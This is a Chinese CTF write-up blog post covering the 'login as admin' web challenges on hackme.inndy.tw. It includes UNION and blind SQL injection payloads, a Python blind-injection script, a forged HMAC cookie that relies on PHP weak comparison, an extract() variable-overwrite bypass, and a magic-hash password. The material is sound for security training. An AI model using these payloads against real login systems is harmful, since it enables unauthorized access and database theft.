hackme.inndy.tw的19道web题解(中)

目录

  • 写在前面
  • ......
  • login as admin 0
  • Login as Admin 0.1
  • login as admin 1.2
  • login as admin 3
  • login as admin 4
  • login as admin 6
  • login as admin 7
  • 待续...

写在前面

最近发现了一个比较有趣的ctf-oj,给出链接

https://hackme.inndy.tw/

里面有不少web题,我这里

因为依照出题人的要求:

本次文章不会直接给出flag,但是会有详细的分析和攻击脚本

0x08 login as admin 0.1

admin\' union select 1,2,3,4#

发现2会回显

构造

admin\' union select 1,database(),3,4#

数据库名login_as_admin0

故此

admin\' union select 1,(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1),3,4#

发现表名h1dden_f14g

admin\' union select 1,(select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=0x68316464656e5f66313467 limit 0,1),3,4#

发现字段名the_f14g

admin\' union select 1,(select the_f14g from h1dden_f14g limit 0,1),3,4#

拿到flag

0x09 Login as Admin 1

关注过滤

php

function safe_filter($str)
{
    $strl = strtolower($str);
    if (strstr($strl, ' ') || strstr($strl, '1=1') || strstr($strl, "''") ||
        strstr($strl, 'union select') || strstr($strl, 'select ')
    ) {
        return '';
    }
    return str_replace("'", "\\'", $str);
}

多了个空格过滤,用/**/绕过即可,对于union select等过滤也十分不严谨,所以修改上题payload即可

admin\'/**/or/**/1/**/limit/**/0,1#

即可

0x10 login as admin 1.2

这次union select不会回显了,选择盲注

但是太卡了……我就没跑……大致脚本如下,测试数据库名正常

python

import requests
url = "https://hackme.inndy.tw/login1/index.php"
flag = ""
for i in range(1,100):
    for j in range(33,127):
        payload = "admin\\'/**/or/**/(ascii(substr((select SCHEMA_NAME from information_schema.SCHEMATA limit 0,1),%s,1))=%s)/**/limit/**/0,1#"%(i,j)
        data = {
            "name":payload,
            "password":"1"
        }
        r = requests.post(url=url,data=data)
        if "You are not admin!" in r.content:
            flag += chr(j)
            print flag
            break

0x11 login as admin 3

关键代码

php

function load_user()
{
    global $secret, $error;
    if(empty($_COOKIE['user'])) {
        return null;
    }
    $unserialized = json_decode(base64_decode($_COOKIE['user']), true);
    $r = hash_hmac('sha512', $unserialized['data'], $secret) != $unserialized['sig'];
    if(hash_hmac('sha512', $unserialized['data'], $secret) != $unserialized['sig']) {
        $error = 'Invalid session';
        return false;
    }
    $data = json_decode($unserialized['data'], true);
    return [
        'name' => $data[0],
        'admin' => $data[1]
    ];
}

发现存在弱比较:

我们只要构造出sig=0即可轻松绕过消息认证码检测:

hash_hmac('sha512', $unserialized['data'], $secret) != $unserialized['sig']

所以构造如下:

php

function set_user()
{
    $user = ['admin',true];
    $data = json_encode($user);
    $sig = 0;
    $all = base64_encode(json_encode(['sig' => $sig, 'data' => $data]));
    echo $all;
}
set_user();

所以cookie里添加user=eyJzaWciOjAsImRhdGEiOiJbXCJhZG1pblwiLHRydWVdIn0=刷新即可得到flag

0x12 login as admin 4

代码逻辑问题,用户名为admin直接可以成功

直接curl -d "name=admin" https://hackme.inndy.tw/login4/

即可获取flag

0x13 login as admin 6

发现关键代码

php

if(!empty($_POST['data'])) {
    try {
        $data = json_decode($_POST['data'], true);
    } catch (Exception $e) {
        $data = [];
    }
    extract($data);
    if($users[$username] && strcmp($users[$username], $password) == 0) {
        $user = $username;
    }
}

其中可以变量覆盖:

extract($data);

所以我们构造:

data = {"users":{"admin":"sky"},"username":"admin","password":"sky"}

即可绕过,并且成功登陆

0x014 login as admin 7

0e开头的md5弱比较

选择:

name = admin

password = QNKCDZO

即可

原文发布于微信公众号 - 安恒网络空间安全讲武堂(gh_fa1e45032807)

原文发表时间:2018-01-31

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏用户2442861的专栏

MySQL数据库(表)的导入导出(备份和还原) mysql 根据一张表数据更新另一张表

update a  ,b  set  a.name = b.name  where  a.id = b.id

2671
来自专栏MYSQL轻松学

你真的熟悉MySQL权限吗?

(以下操作都是以root身份登陆进行grant授权,以root@localhost身份登陆执行各种命令。) MySQL包含哪些权限,共29个。 权限说明举例us...

4273
来自专栏个人分享

Hive操作表部分总结

create table tableName(time INT,userid BIGINT,url STRING,ip STRING COMMENT 'IP A...

1772
来自专栏Ken的杂谈

CentOS 6/7 下MySQL 8.0 安装部署与配置

7817
来自专栏13blog.site

Spring+SpringMVC+MyBatis+easyUI整合优化篇(七)图片上传功能

前言 前一篇文章《Spring+SpringMVC+MyBatis+easyUI整合优化篇(六)easyUI与富文本编辑器UEditor整合》讲了富文本编辑器U...

3454
来自专栏我的博客

Zend FrameWork 配置文件(初级版)

[production] ;命名空间配置以及自动命名空间注册 autoloadernamespaces[] = “Zend_” autoloadernam...

2715
来自专栏流柯技术学院

MYSQL设置远程账户登陆总结

打开 /etc/mysql/my.cnf 文件,找到 bind-address = 127.0.0.1 修改为 bind-address = 0.0.0.0

2163
来自专栏MasiMaro 的技术博文

xampp 中 mysql的相关配置

最近开始接触PHP,而一般搭建PHP环境使用的都是xampp 这个集成环境,由于之前我的系统中已经安装了mysql服务,所以在启动mysql的时候出现一些列错误...

2633
来自专栏云数据库

MyDumper原理简介

相对于 MySQL 官方提供的逻辑备份工具 mysqldump,mydumper 最突出的特性就是可采用多线程并行备份,极大提高了数据导出的速度。本文基于 my...

7008
来自专栏null的专栏

Linux C 编程——互斥锁mutex

1、多线程的问题引入 多线程的最大的特点是资源的共享,但是,当多个线程同时去操作(同时去改变)一个临界资源时,会破坏临界资源。如利用多线程同时写一个文件: #i...

44810

扫码关注云+社区

领取腾讯云代金券